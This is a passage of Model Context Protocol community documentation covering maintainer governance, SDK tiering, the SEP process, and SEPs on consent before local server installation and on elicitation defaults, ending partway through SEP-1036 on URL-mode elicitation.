* Thoughtful and productive engagement with community contributors
* Maintaining and improving their respective area of the MCP project
* Supporting documentation, roadmaps, and other adjacent parts of the MCP project
* Presenting ideas from the community to Core Maintainers
Maintainers are encouraged to propose additional maintainers when needed. Only Core Maintainers or Lead Maintainers can appoint or remove Maintainers, and they may do so at any time and without cause.
Maintainers have write and/or admin access to their respective repositories.
### Core Maintainers
The Core Maintainers are expected to have a deep understanding of the Model Context Protocol and its specification. Their responsibilities include:
* Designing, reviewing, and steering the evolution of the MCP specification, as well as all other parts of the MCP project
* Articulating a cohesive long-term vision for the project
* Mediating and resolving contentious issues with fairness and transparency, seeking consensus where possible while making decisive choices when necessary
* Appointing or removing Maintainers
* Stewardship of the MCP project in the best interest of MCP
The Core Maintainers as a group have the power to veto any decisions made by Maintainers by majority vote. The Core Maintainers have power to resolve disputes as they see fit. The Core Maintainers should publicly articulate their decision-making. The core group is responsible for adopting their own procedures for making decisions.
Core Maintainers generally have write and admin access to all MCP repositories, but should use the same contribution (usually pull-request) mechanism as outside contributors. Exceptions can be made based on security considerations.
### Lead Maintainers (BDFL)
MCP has two Lead Maintainers: Justin Spahr-Summers and David Soria Parra. Lead Maintainers can veto any decision by Core Maintainers or Maintainers. This model is also commonly known as Benevolent Dictator for Life (BDFL) in the open source community.
The Lead Maintainers should publicly articulate their decision-making and give clear reasoning for their decisions. Lead Maintainers are part of the Core Maintainer group.
The Lead Maintainers are responsible for confirming or removing Core Maintainers.
Lead Maintainers are administrators on all infrastructure for the MCP project where possible. This includes but is not restricted to all communication channels, GitHub organizations, and repositories.
### Decision Process
The Core Maintainer group meets every two weeks to discuss and vote on proposals, as well as any other topics that need attention. The shared Discord server can be used to discuss and vote on smaller proposals if needed.
The Lead Maintainer, Core Maintainer, and Maintainer group should attempt to meet in person every three to six months.
## Processes
Core Maintainers and Lead Maintainers are responsible for all aspects of Model Context Protocol, including documentation, issues, suggestions for content, and all other parts under the [MCP project](https://github.com/modelcontextprotocol). Maintainers are responsible for documentation, issues, and suggestions of content for their area of the MCP project, but are encouraged to partake in general maintenance of the MCP projects.
Maintainers, Core Maintainers, and Lead Maintainers should use the same contribution process as external contributors, rather than making direct changes to repos. This provides insight into intent and opportunity for discussion.
### Working Groups and Interest Groups
MCP collaboration and contributions are organized around two structures: [Working Groups and Interest Groups](/community/working-interest-groups).
* **Interest Groups** identify and articulate problems that MCP should address through open discussions
* **Working Groups** develop concrete solutions by producing deliverables like SEPs or implementations
For details on how to create, participate in, and facilitate these groups, see the [Working and Interest Groups](/community/working-interest-groups) documentation.
### Specification Enhancement Proposals (SEPs)
Proposed changes to the specification must be submitted as [Specification Enhancement Proposals (SEPs)](/community/sep-guidelines). SEPs are the primary mechanism for proposing major new features, collecting community input, and documenting design decisions.
For the complete SEP process, format requirements, and status workflow, see the [SEP Guidelines](/community/sep-guidelines).
### Maintenance Responsibilities
Components without dedicated maintainers (such as documentation) fall under Core Maintainer responsibility. These follow standard contribution guidelines through pull requests, with maintainers handling reviews and escalating to Core Maintainer review for any significant changes.
Core Maintainers and Maintainers are encouraged to improve any part of the MCP project, regardless of formal maintenance assignments.
## Communication
### Core Maintainer Meetings
The Core Maintainer group meets on a bi-weekly basis to discuss proposals and the project. Notes on proposals should be made public. The Core Maintainer group will strive to meet in person every 3-6 months.
### Public Chat
The MCP project maintains a [public Discord server](https://discord.gg/6CSzBmMkjX) with open chats for interest groups. The MCP project may have private channels for certain communications.
## Nominating, Confirming, and Removing Maintainers
### Principles
* Membership in maintainer groups is granted to **individuals** on a merit basis after they have demonstrated strong expertise in their area of work through contributions, reviews, and discussions, and have shown alignment with the overall MCP direction.
* For membership in the **Maintainer** group, the individual has to demonstrate strong and continued alignment with the overall MCP principles.
* No term limits for Maintainers or Core Maintainers.
* Working Group or sub-project maintainers who don't actively participate over long periods of time may be moved to 'emeritus' status under light criteria. Each maintainer group may define the inactive period that's appropriate for their area.
* The membership is for an individual, not a company.
### Nomination and Removal
* The Lead Maintainers are responsible for adding and removing Core Maintainers.
* Core Maintainers are responsible for adding and removing Maintainers. They will take the consideration of existing Maintainers into account.
* If a Working Group or Interest Group with 2+ existing Maintainers unanimously agrees to add additional Maintainers (up to a maximum of 5), they may do so without Core Maintainer review.
### Nomination Process
If a Maintainer (or Core/Lead Maintainer) wishes to propose a nomination for the Core/Lead Maintainers' consideration, they should follow this process:
1. Collect evidence for the nomination. This will generally come in the form of a history of merged PRs on the repositories for which maintainership is being considered.
2. Discuss among Maintainers of the relevant group(s) as to whether they would be supportive of approving the nomination.
3. DM a Community Moderator or Core Maintainer to create a private channel in Discord, in the format `nomination-{name}-{group}`. Add all Core Maintainers, Lead Maintainers, and co-Maintainers on the relevant group.
4. Provide context for the individual under nomination. See below for suggestions on what to include.
5. Create a Discord Poll and ask Core/Lead Maintainers to vote Yes/No on the nomination. Reaching consensus is encouraged though not required.
6. After Core/Lead Maintainers discuss and/or vote, if the nomination is favorable, relevant members with permissions to update GitHub and Discord roles will add the nominee to the appropriate groups. The nominator should announce the new maintainership in the relevant Discord channel.
7. The temporary Discord channel will be deleted a week later.
**Suggestions for nomination context:**
* GitHub profile link, LinkedIn profile link, Discord username
* For what group(s) are you nominating the individual for maintainership
* Whether the group(s) agree that this person should be elevated to maintainership
* Description of their contributions to date (including links to most substantial contributions)
* Description of expected contributions moving forward (e.g., Are they eager to be a Maintainer? Will they have capacity to do so?)
* Other context about the individual (e.g., current employer, motivations behind MCP involvement)
* Anything else you think may be relevant to consider for the nomination
## Current Core Maintainers
* Peter Alexander
* Caitie McCaffrey
* Kurtis Van Gent
* Paul Carleton
* Nick Cooper
* Nick Aldridge
* Che Liu
* Den Delimarsky
## Current Maintainers and Working Groups
Refer to [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md).
# SDK Tiering System
Source: https://modelcontextprotocol.io/community/sdk-tiers
Feature completeness, protocol support, and maintenance commitment levels for Model Context Protocol SDKs
The MCP SDK Tiering System establishes clear expectations for feature completeness, protocol support, and maintenance commitments across official and community-driven SDKs. This helps developers choose the right SDK for their needs and gives SDK maintainers a clear path to improving their SDK's tier and adoption.
**Key dates:**
* **January 23, 2026**: Conformance tests available
* **February 23, 2026**: Official SDK tiering published
Between January 23 and February 23, SDK maintainers can work with the
Conformance Testing working group to adopt the tests and set up GitHub issue
tracking with the standardized labels defined below.
## Overview
SDKs are classified into three tiers based on feature completeness, maintenance commitments, and documentation quality:
* **Tier 1**: Fully supported SDKs with complete protocol implementation, including all
non-experimental features and optional capabilities like sampling and elicitation
* **Tier 2**: Actively-maintained SDKs working toward full protocol specification support
* **Tier 3**: Experimental, partially implemented, or specialized SDKs
Experimental features (such as Tasks) and protocol extensions (such as MCP Apps) are not required
for any tier.
## Tier Requirements
| Requirement | Tier 1: Fully Supported | Tier 2: Commitment to Full Support | Tier 3: Experimental |
| --------------------------- | ---------------------------------------------------------------------------------------- | ---------------------------------------------------------------- | ---------------------- |
| **Conformance Tests** | 100% pass rate | 80% pass rate | No minimum |
| **New Protocol Features** | Before new spec version release, timeline agreed per release based on feature complexity | Within 6 months | No timeline commitment |
| **Issue Triage** | Within 2 business days | Within a month | No requirement |
| **Critical Bug Resolution** | Within 7 days | Within two weeks | No requirement |
| **Stable Release** | Required with clear versioning | At least one stable release | Not required |
| **Documentation** | Comprehensive with examples for all features | Basic documentation covering core features | No minimum |
| **Dependency Policy** | Published update policy | Published update policy | Not required |
| **Roadmap** | Published roadmap | Published plan toward Tier 1 or explanation for remaining Tier 2 | Not required |
**Issue Triage** means labeling and determining whether an issue is valid, not resolving the issue.
**Critical Bug** refers to P0 issues (see [Priority labels](#priority-only-if-actionable) for
detailed criteria).
**Stable Release** is a published version explicitly marked as production-ready (e.g., version `1.0.0`
or higher without pre-release identifiers like `-alpha`, `-beta`, or `-rc`).
**Clear Versioning** means following idiomatic versioning patterns with documented
breaking change policies, so users can understand compatibility expectations when upgrading.
**Roadmap** outlines concrete steps and work items that track implementation of required MCP
specification components (non-experimental features and optional capabilities as described in
[Conformance Testing](#conformance-testing)), giving users visibility into upcoming feature support.
## Conformance Testing
All SDKs are evaluated using [automated conformance tests](https://github.com/modelcontextprotocol/conformance)
that validate protocol support against the published specifications. SDKs receive a conformance score
based on test results:
* **Tier 1**: 100% conformance required
* **Tier 2**: 80% conformance required
* **Tier 3**: No minimum requirement
Conformance scores are calculated against **applicable required tests** only:
* Tests for the specification version the SDK targets
* Excluding tests marked as pending or skipped
* Excluding tests for experimental features
* Excluding legacy backward-compatibility tests (unless the SDK claims legacy support)
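In other words, the score is the pass rate over that filtered set of tests. A sketch of the arithmetic (the numbers are illustrative, not real test counts):

```bash theme={null}
# Applicable tests exclude pending/skipped tests, experimental features, and
# (unless legacy support is claimed) legacy backward-compatibility tests
total=60; pending=4; experimental=3; legacy=3; passed=45
applicable=$((total - pending - experimental - legacy))  # 50 applicable tests
score=$((passed * 100 / applicable))                     # 45 of 50 => 90
echo "Conformance score: ${score}%"
```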
Conformance testing validates that SDKs correctly implement the protocol by running standardized test
scenarios and checking protocol message exchanges. See [Tier Relegation](#tier-relegation) for how
temporary test failures are handled.
## Tier Advancement
SDK maintainers can request tier advancement by:
1. Self-assessing against tier requirements
2. Opening an issue in the [modelcontextprotocol/modelcontextprotocol](https://github.com/modelcontextprotocol/modelcontextprotocol) repository with supporting evidence
3. Passing automated conformance testing
4. Receiving approval from SDK Working Group maintainers
The SDK Working Group reviews advancement requests and makes final tier assignments.
## Tier Relegation
An SDK may be moved to a lower tier if existing conformance tests on the latest stable release fail
continuously for 4 weeks:
* **Tier 1 → Tier 2**: Any conformance test fails
* **Tier 2 → Tier 3**: More than 20% of conformance tests fail
## Issue Triage Labels
SDK repositories must use consistent labels to enable automated reporting on issue handling metrics.
Tier calculations use these metrics to measure triage response times (time from issue creation to
first label) and critical bug resolution times (time from P0 label to issue close).
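As a rough illustration, these metrics can be spot-checked with the GitHub CLI (the repository name here is just an example):

```bash theme={null}
# Open issues with no labels yet, i.e., still awaiting triage
gh issue list --repo modelcontextprotocol/typescript-sdk --state open --search "no:label"

# Closed P0 issues, for reviewing critical-bug resolution times
gh issue list --repo modelcontextprotocol/typescript-sdk --state closed --label P0
```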
### Type (pick one)
| Label | Description |
| ------------- | ----------------------------- |
| `bug` | Something isn't working |
| `enhancement` | Request for new feature |
| `question` | Further information requested |
Repositories using [GitHub's native issue types](https://docs.github.com/en/issues/tracking-your-work-with-issues/using-issues/managing-issue-types-in-an-organization)
satisfy this requirement without needing type labels.
### Status (pick one)
Use these exact label names across all repositories to enable consistent reporting and analysis.
| Label | Description |
| -------------------- | ------------------------------------------------------- |
| `needs confirmation` | Unclear if still relevant |
| `needs repro` | Insufficient information to reproduce |
| `ready for work` | Has enough information to start |
| `good first issue` | Good for newcomers |
| `help wanted` | Contributions welcome from those familiar with codebase |
### Priority (only if actionable)
| Label | Description |
| ----- | --------------------------------------------------------------- |
| `P0` | Critical: core functionality failures or high-severity security |
| `P1` | Significant bug affecting many users |
| `P2` | Moderate issues, valuable feature requests |
| `P3` | Nice to haves, rare edge cases |
**P0 (Critical)** issues are:
* **Security vulnerabilities** with CVSS score ≥ 7.0 (High or Critical severity)
* **Core functionality failures** that prevent basic MCP operations: connection establishment,
message exchange, or use of core primitives (tools, resources, prompts)
# SEP Guidelines
Source: https://modelcontextprotocol.io/community/sep-guidelines
Specification Enhancement Proposal (SEP) guidelines for proposing changes to the Model Context Protocol
## What is a SEP?
SEP stands for Specification Enhancement Proposal. A SEP is a design document providing information to the MCP community, or describing a new feature for the Model Context Protocol or its processes. The SEP should provide a concise technical specification of the feature and a rationale for the feature.
SEPs are the primary mechanism for proposing major new features, collecting community input on an issue, and documenting the design decisions that have gone into MCP. The SEP author is responsible for building consensus within the community and documenting dissenting opinions.
SEPs are maintained as markdown files in the [`seps/` directory](https://github.com/modelcontextprotocol/modelcontextprotocol/tree/main/seps) of the specification repository. Their revision history serves as the historical record of the feature proposal.
## When to Write a SEP
The SEP process is reserved for changes that are substantial enough to require broad community discussion, a formal design document, and a historical record. A regular GitHub pull request is often more appropriate for smaller changes.
**Write a SEP if your change involves:**
* **A new feature or protocol change** - Adding, modifying, or removing features in the protocol (new API methods, message format changes, interoperability standards)
* **A breaking change** - Any change that is not backwards-compatible
* **A governance or process change** - Altering decision-making or contribution guidelines
* **A complex or controversial topic** - Changes likely to have multiple valid solutions or generate significant debate
**Skip the SEP process for:**
* Bug fixes and typo corrections
* Documentation clarifications
* Adding examples to existing features
* Minor schema fixes that don't change behavior
Not sure? Ask in [Discord](https://discord.gg/6CSzBmMkjX) before starting significant work.
## SEP Types
There are three kinds of SEP:
1. **Standards Track** - Describes a new feature or implementation for the Model Context Protocol, or an interoperability standard supported outside the core specification.
2. **Informational** - Describes a design issue or provides guidelines/information to the community without proposing a new feature.
3. **Process** - Describes a process surrounding MCP or proposes a change to a process (like this document).
## SEP Workflow
```mermaid theme={null}
flowchart TD
Idea["Idea"]
AwaitingSponsor{"Awaiting Sponsor (up to 6 months)"}
Draft["Draft"]
Dormant["Dormant (no sponsor)"]
Withdrawn["Withdrawn (by author)"]
InReview["In-Review"]
Decision{"Core Maintainers decide"}
Accepted["Accepted"]
Rejected["Rejected"]
Final["Final"]
Idea -->|"Submit PR with SEP file"| AwaitingSponsor
AwaitingSponsor --> Draft
AwaitingSponsor --> Dormant
AwaitingSponsor --> Withdrawn
Draft -->|"Sponsor reviews"| InReview
InReview --> Decision
Decision --> Accepted
Decision --> Rejected
Accepted -->|"Reference implementation complete"| Final
```
### Step-by-Step Process
1. **Draft your SEP** as a markdown file named `0000-your-feature-title.md`, using `0000` as a placeholder. Follow the [SEP format](#sep-format) below.
2. **Create a pull request** adding your SEP file to the `seps/` directory in the [specification repository](https://github.com/modelcontextprotocol/modelcontextprotocol).
3. **Update the SEP number**: Once your PR is created, rename the file using the PR number (e.g., PR #1850 becomes `1850-your-feature-title.md`) and update the SEP header (see the sketch after this list).
4. **Find a Sponsor**: Tag a Core Maintainer or Maintainer from [the maintainer list](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md). Choose someone whose area relates to your proposal. Tips:
* Tag 1-2 relevant maintainers, not everyone
* Share your PR in the relevant Discord channel
* If no response after 2 weeks, ask in `#general`
5. **Sponsor assigns themselves**: When a sponsor agrees, they assign themselves to the PR and update the SEP status to `draft`.
6. **Informal review**: The sponsor reviews the proposal and may request changes. Discussion happens in PR comments.
7. **Formal review**: When ready, the sponsor updates the status to `in-review`. The SEP enters formal review by Core Maintainers (meetings every two weeks).
8. **Resolution**: The SEP may be `accepted`, `rejected`, or returned for revision. The sponsor updates the status.
9. **Finalization**: Once accepted, the reference implementation must be completed. When complete and incorporated into the specification, the sponsor updates the status to `final`.
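A minimal sketch of steps 1 and 3 from the command line (the branch name and PR number are illustrative):

```bash theme={null}
# Step 1: draft the SEP using the 0000 placeholder
git checkout -b sep/your-feature-title
touch seps/0000-your-feature-title.md

# Step 3: once the PR is open (say it becomes #1850), rename the file
git mv seps/0000-your-feature-title.md seps/1850-your-feature-title.md
git commit -m "Rename SEP file to match PR number (#1850)"
```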
### SEP Statuses
| Status | Meaning |
| ------------ | ------------------------------------------------ |
| `draft` | Has a sponsor, undergoing informal review |
| `in-review` | Ready for formal Core Maintainer review |
| `accepted` | Approved, awaiting reference implementation |
| `rejected` | Declined by Core Maintainers |
| `withdrawn` | Author withdrew the proposal |
| `final` | Complete with reference implementation |
| `superseded` | Replaced by a newer SEP |
| `dormant` | No sponsor found within 6 months; can be revived |
**Important distinction**: `dormant` is not the same as `rejected`. A dormant SEP simply didn't find a sponsor - the idea may still be valid. If circumstances change (new community interest, new use cases), a dormant SEP can be revived by finding a sponsor and reopening the PR.
## SEP Format
Each SEP should have the following parts:
### 1. Preamble
A short descriptive title, author names/contact info, current status, SEP type, and PR number.
### 2. Abstract
A short (\~200 word) description of the technical issue being addressed.
### 3. Motivation
Why the existing protocol specification is inadequate. This is critical - SEPs without sufficient motivation may be rejected outright.
### 4. Specification
The technical specification describing syntax and semantics of the new feature. Must be detailed enough for competing, interoperable implementations.
### 5. Rationale
Why particular design decisions were made, alternate designs considered, and related work. Should provide evidence of community consensus and address objections raised during discussion.
### 6. Backward Compatibility
All SEPs introducing backward incompatibilities must describe these incompatibilities, their severity, and how to deal with them.
### 7. Reference Implementation
Must be completed before the SEP reaches "Final" status, but need not be complete before acceptance.
### 8. Security Implications
Any security concerns related to the SEP should be explicitly documented.
See the [SEP template](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/seps/README.md#sep-file-structure) for the complete file structure.
## Prototype Requirements
Before a SEP can be accepted, you need "a prototype implementation demonstrating the proposal." Here's what qualifies:
**Acceptable prototypes:**
* A working implementation in one of the official SDKs (as a branch/fork)
* A standalone proof-of-concept demonstrating the key mechanics
* Integration tests showing the proposed behavior
* A reference server or client implementing the feature
**The prototype should:**
* Demonstrate the core functionality works as described
* Show the API design is practical and ergonomic
* Reveal any edge cases or implementation challenges
* Be runnable by reviewers (include setup instructions)
**Not sufficient:**
* Pseudocode alone
* A design document without code
* "Trust me, it works" - reviewers need to see it
The prototype doesn't need to be production-ready. It exists to prove feasibility and surface issues early.
## The Sponsor Role
A Sponsor is a Core Maintainer or Maintainer who champions the SEP through the review process. The sponsor's responsibilities include:
* Reviewing the proposal and providing constructive feedback
* Requesting changes based on community input
* **Updating the SEP status** as the proposal progresses
* Initiating formal review when the SEP is ready
* Presenting and discussing the proposal at Core Maintainer meetings
* Ensuring the proposal meets quality standards
Authors should request status changes through their sponsor rather than modifying the status field themselves.
## Status Management
**The Sponsor is responsible for updating the SEP status.** This ensures status transitions are made by someone with the authority and context to do so appropriately.
The sponsor:
1. Updates the `Status` field directly in the SEP markdown file (or, if they do not have access to the source repo, works with the author to set the right status)
2. Applies matching labels to the pull request (e.g., `draft`, `in-review`, `accepted`)
Both the markdown status field and PR labels should be kept in sync. The markdown file is the canonical record (versioned with the proposal), while PR labels make it easy to filter and search.
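For example, a sponsor moving a SEP into formal review might sync the PR labels like this (reusing the illustrative PR #1850 from earlier):

```bash theme={null}
# After updating the Status field in the SEP markdown file, sync the PR labels
gh pr edit 1850 --add-label "in-review" --remove-label "draft"
```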
## SEP Review & Resolution
SEPs are reviewed by the MCP Core Maintainers team every two weeks.
For a SEP to be accepted it must meet these criteria:
* A prototype implementation demonstrating the proposal
* Clear benefit to the MCP ecosystem
* Community support and consensus
Once a SEP has been accepted, the reference implementation must be completed. When complete and incorporated into the main repository, the status changes to "Final".
## After Rejection
Rejection is not permanent. You can:
1. **Address the feedback** - If specific concerns were raised, address them and resubmit
2. **Discuss the rejection** - Ask in Discord to understand the reasoning
3. **Submit a competing SEP** - Sometimes a different approach works better
4. **Wait for the right time** - Community needs evolve; what's rejected today may be welcomed later
## Reporting SEP Bugs or Updates
For SEPs not yet reaching `final` state, comment directly on the SEP's pull request. Once a SEP is finalized and merged, submit updates by creating a new pull request that modifies the SEP file.
## Transferring SEP Ownership
It occasionally becomes necessary to transfer ownership of SEPs to a new author. In general, we'd like to retain the original author as a co-author, but that's up to the original author.
Good reasons to transfer ownership:
* Original author no longer has time or interest
* Original author is unreachable
Bad reasons:
* You disagree with the direction (submit a competing SEP instead)
## Copyright
This document is placed in the public domain or under the CC0-1.0-Universal license, whichever is more permissive.
# SEP-1024: MCP Client Security Requirements for Local Server Installation
Source: https://modelcontextprotocol.io/community/seps/1024-mcp-client-security-requirements-for-local-server-
MCP Client Security Requirements for Local Server Installation
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1024 |
| **Title** | MCP Client Security Requirements for Local Server Installation |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Den Delimarsky |
| **Sponsor** | None |
| **PR** | [#1024](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1024) |
***
## Abstract
This SEP addresses critical security vulnerabilities in MCP client implementations that support one-click installation of local MCP servers. The current MCP specification lacks explicit security requirements for client-side installation flows, allowing malicious actors to execute arbitrary commands on user systems through crafted MCP server configurations distributed via links or social engineering.
This proposal establishes a best practice for MCP clients, requiring explicit user consent before executing any local server installation commands and complete command transparency.
## Motivation
The existing MCP specification does not address client-side security concerns related to streamlined ("one-click") local server configuration. Current MCP clients that implement these configuration experiences create significant attack vectors:
1. **Silent Command Execution**: MCP clients can automatically execute embedded commands without user review or consent when installing local servers via one-click flows.
2. **Lack of Visibility**: Users have no insight into what commands are being executed on their systems, creating opportunities for data exfiltration, system compromise, and privilege escalation.
3. **Social Engineering Vulnerabilities**: Users become comfortable executing commands labeled as "MCP servers" without proper scrutiny, making them susceptible to malicious configurations.
4. **Arbitrary Code Execution**: Attackers can embed harmful commands in MCP server configurations and distribute them through legitimate channels (repositories, documentation, social media).
Visual Studio Code [addressed this](https://den.dev/blog/vs-code-mcp-install-consent/) by implementing consent dialogs. Similarly, Cursor also supports a consent dialog for one-click local MCP server installation.
Without explicit security requirements in the specification, MCP client implementers may unknowingly create vulnerable installation flows, putting end users at risk of system compromise.
## Specification
### Client Security Requirements
MCP clients that support one-click local MCP server configuration **MUST** implement the following security controls:
#### Pre-Configuration Consent
Before executing any command to install or configure a local MCP server, the MCP client **MUST**:
1. Display a clear consent dialog that shows:
* The exact command that will be executed, without truncation
* All arguments and parameters
* A clear warning that this operation may be potentially dangerous
2. Require explicit user approval through an affirmative action (button click, checkbox, etc.)
3. Provide an option for users to cancel the installation
4. Not proceed with installation if consent is denied or not provided
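In practice, these requirements amount to a blocking consent gate in front of whatever code executes the install command. The sketch below illustrates the idea; `ServerInstallConfig` and `showDialog` are hypothetical client-side helpers, not part of the specification:

```typescript theme={null}
// Illustrative consent gate for one-click local server installation.
interface ServerInstallConfig {
  command: string; // e.g. "npx"
  args: string[];  // the full, untruncated argument list
}

async function confirmInstall(
  config: ServerInstallConfig,
  showDialog: (text: string) => Promise<boolean>, // resolves true only on explicit approval
): Promise<boolean> {
  // Show the exact command, without truncation, plus a clear warning.
  const fullCommand = [config.command, ...config.args].join(" ");
  return showDialog(
    `This will run the following command on your machine:\n\n` +
      `  ${fullCommand}\n\n` +
      `Running unknown commands can be dangerous. Continue?`,
  );
}

// Callers proceed with installation only if confirmInstall resolves to true.
```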
## Rationale
### Design Decisions
**Mandatory Consent Dialogs**: The requirement for explicit consent dialogs balances security with usability. While this adds friction to the MCP server configuration process, it prevents potential breaches from silent command execution.
## Backward Compatibility
This SEP introduces new **requirements** for MCP client implementations but does not change the core MCP protocol or wire format.
**Impact Assessment:**
* **Low Impact**: Existing MCP servers and the core protocol remain unchanged
* **Client Implementation Required**: MCP clients must update their local server installation flows to comply with new security requirements
* **User Experience Changes**: Users will see consent dialogs where none existed before
**Migration Path:**
1. MCP clients can implement these changes in new versions without breaking existing functionality
2. Existing installed MCP servers continue to work normally
3. Only new installation flows require the consent mechanisms
No protocol-level backward compatibility issues exist, as this SEP addresses client behavior rather than the MCP wire protocol.
## Reference Implementation
N/A
## Security Implications
### Security Benefits
This SEP directly addresses:
* **Arbitrary Code Execution**: Prevents silent execution of malicious commands
* **Social Engineering**: Forces users to consciously review commands before execution
* **Supply Chain Attacks**: Creates visibility into MCP server installation commands
* **Privilege Escalation**: Users can identify and reject commands requesting elevated privileges
### Residual Risks
Even with these controls, risks remain:
* **User Override**: Users may approve malicious commands despite warnings
* **Sophisticated Obfuscation**: Advanced attackers may craft commands that appear legitimate
* **Implementation Gaps**: Clients may implement controls incorrectly
### Risk Mitigation
These residual risks are addressed through:
* Clear warning language in consent dialogs
* Recommendation for additional security layers (sandboxing, signatures)
* Ongoing security research and community awareness
# SEP-1034: Support default values for all primitive types in elicitation schemas
Source: https://modelcontextprotocol.io/community/seps/1034--support-default-values-for-all-primitive-types-in
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1034 |
| **Title** | Support default values for all primitive types in elicitation schemas |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Tapan Chugh (chugh.tapan@gmail.com) |
| **Sponsor** | None |
| **PR** | [#1034](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1034) |
***
## Abstract
This SEP recommends adding support for default values to all primitive types in the MCP elicitation schema (StringSchema, NumberSchema, and EnumSchema), extending the existing support that only covers BooleanSchema.
## Motivation
Elicitations in MCP offer a way to mitigate complex API designs: tools can request information on demand rather than resorting to convoluted parameter handling. The challenge, however, is that users must manually enter obvious information that could be pre-populated for more natural interactions. Currently, only `BooleanSchema` supports default values in elicitation requests. This limitation prevents servers from providing sensible defaults for text inputs, numbers, and enum selections, leading to unnecessary user overhead.
### Real-World Example
Consider implementing an email reply function. Without elicitation, the tool becomes unwieldy:
```python theme={null}
def reply_to_email_thread(
    thread_id: str,
    content: str,
    recipient_list: List[str] = [],
    cc_list: List[str] = []
) -> None:
    # Ambiguity: does an empty list mean "no recipients" or "use defaults"?
    # Complex logic is needed to handle the different combinations.
    ...
```
With elicitation, the tool signature itself can be much simpler:
```python theme={null}
def reply_to_email_thread(
    thread_id: str,
    content: Optional[str] = ""
) -> None:
    # Code can look up the participants from the original thread
    # and prepare an elicitation request with the defaults set up.
    ...
```
```typescript theme={null}
const response = await client.request("elicitation/create", {
  message: "Configure email reply",
  requestedSchema: {
    type: "object",
    properties: {
      recipients: {
        type: "string",
        title: "Recipients",
        default: "alice@company.com, bob@company.com" // Pre-filled
      },
      cc: {
        type: "string",
        title: "CC",
        default: "john@company.com" // Pre-filled
      },
      content: {
        type: "string",
        title: "Message",
        default: "" // If provided in the tool above
      }
    }
  }
});
```
### Implementation
A working implementation demonstrates that clients need only minimal changes (\~10 lines of code) to display defaults:
* Implementation PR: [https://github.com/chughtapan/fast-agent/pull/2](https://github.com/chughtapan/fast-agent/pull/2)
* A demo with the above email reply workflow: [https://asciinema.org/a/X7aQZjT2B5jVwn9dJ9sqQVkOM](https://asciinema.org/a/X7aQZjT2B5jVwn9dJ9sqQVkOM)
## Specification
### Schema Changes
Extend the elicitation primitive schemas to include optional default values:
```typescript theme={null}
export interface StringSchema {
  type: "string";
  title?: string;
  description?: string;
  minLength?: number;
  maxLength?: number;
  format?: "email" | "uri" | "date" | "date-time";
  default?: string; // NEW
}

export interface NumberSchema {
  type: "number" | "integer";
  title?: string;
  description?: string;
  minimum?: number;
  maximum?: number;
  default?: number; // NEW
}

export interface EnumSchema {
  type: "string";
  title?: string;
  description?: string;
  enum: string[];
  enumNames?: string[];
  default?: string; // NEW - must be one of enum values
}

// BooleanSchema already has default?: boolean
```
### Behavior
1. The `default` field is optional, maintaining full backward compatibility
2. Default values must match the schema type
3. For EnumSchema, the default must be one of the valid enum values
4. Clients that support defaults SHOULD pre-populate form fields. Clients that don't support defaults MAY ignore the field entirely.
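A client that supports defaults might validate them before pre-populating form fields. The following is a minimal sketch of the rules above, using a simplified stand-in for the spec's primitive schema types:

```typescript theme={null}
// Sketch: checking that a schema's default obeys the rules above.
interface WireSchema {
  type: "string" | "number" | "integer" | "boolean";
  enum?: string[];
  default?: unknown;
}

function isDefaultValid(schema: WireSchema): boolean {
  if (schema.default === undefined) return true; // defaults are optional
  switch (schema.type) {
    case "string":
      if (typeof schema.default !== "string") return false;
      // For enum schemas, the default must be one of the valid enum values.
      return schema.enum ? schema.enum.includes(schema.default) : true;
    case "boolean":
      return typeof schema.default === "boolean";
    default: // "number" | "integer"
      return typeof schema.default === "number";
  }
}
```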
## Rationale
1. The high-level rationale is to follow the precedent set by BooleanSchema rather than creating new mechanisms.
2. Making defaults optional ensures backward compatibility.
3. This maintains the high-level intuition of keeping the client implementation simple.
### Alternatives Considered
1. **Server-side Templates**: Servers could maintain templates separately, but this adds complexity
2. **New Request Type**: A separate request type for forms with defaults would fragment the API
3. **Required Defaults**: Making defaults required would break existing implementations
## Backwards Compatibility
This change is fully backward compatible with no breaking changes. Clients that don't understand defaults will ignore them, and existing elicitation requests continue to work unchanged. Clients can adopt default support at their own pace.
## Security Implications
No new security concerns:
1. **No Sensitive Data**: The existing guidance against requesting sensitive information still applies
2. **Client Control**: Clients retain full control over what data is sent to servers
3. **User Visibility**: Default values are visible to users who can modify them before submission
# SEP-1036: URL Mode Elicitation for secure out-of-band interactions
Source: https://modelcontextprotocol.io/community/seps/1036-url-mode-elicitation-for-secure-out-of-band-intera
| Field | Value |
| ------------- | ------------------------------------------------------------------------------------------------------------------------- |
| **SEP** | 1036 |
| **Title** | URL Mode Elicitation for secure out-of-band interactions |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-07-22 |
| **Author(s)** | Nate Barbettini ([@nbarbettini](https://github.com/nbarbettini)) and Wils Dawson ([@wdawson](https://github.com/wdawson)) |
| **Sponsor** | None |
| **PR** | [#1036](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1036) |
***
## Abstract
This SEP introduces a new `url` mode for the existing elicitation client capability, enabling secure out-of-band interactions that bypass the MCP client. URL mode elicitation addresses sensitive use cases that form mode elicitation cannot, such as gathering sensitive credentials, performing OAuth flows for external (3rd-party) authorization, and handling payments, *without* exposing sensitive data to the MCP client. By directing users to trusted URLs in their browser, this mode maintains security boundaries while enabling rich integrations with third-party services.
## Motivation
The current MCP specification (2025-06-18) provides an elicitation mechanism for gathering non-sensitive information from users through structured, in-band requests (most commonly imagined as the MCP client rendering a form to collect data from the end-user). However, several critical use cases require interactions that must not pass through the MCP client:
1. Sensitive data collection: API keys, passwords, and other credentials must never transit through intermediary systems.
